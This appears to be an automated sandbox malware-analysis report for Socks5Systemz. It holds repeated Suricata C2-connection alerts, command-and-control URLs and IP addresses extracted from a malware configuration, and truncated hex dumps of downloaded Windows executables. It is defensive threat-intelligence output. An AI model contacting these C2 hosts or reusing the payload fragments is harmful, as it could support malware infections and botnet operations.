Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50514 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50342 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50528 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50528 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50458 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50575 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50558 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50558 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50623 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50538 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50469 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50342 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50506 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50395 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50395 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50542 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50542 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50489 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50489 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50504 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50504 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50446 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50677 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50676 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50446 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50604 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50456 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50456 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50461 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50377 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50358 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50506 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50582 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50724 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50724 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50477 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50458 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50352 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50319 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50633 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50633 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50319 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50587 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50587 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50410 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50507 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50507 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50601 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50601 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50585 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50612 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50612 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50455 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50405 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50352 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50525 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50525 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50518 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50677 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50676 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50627 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50369 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50410 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50477 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50585 -> 185.208.158.202:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: 3xc1aimbl0w.sbs
Source: Malware configuration extractor	URLs: faintbl0w.sbs
Source: Malware configuration extractor	URLs: 300snails.sbs
Source: Malware configuration extractor	URLs: thicktoys.sbs
Source: Malware configuration extractor	IPs: 185.215.113.43

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 2023 -> 50435
Source: unknown	Network traffic detected: HTTP traffic on port 50435 -> 2023

Source: global traffic

TCP traffic: 192.168.2.4:50118 -> 89.105.201.183:2023

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
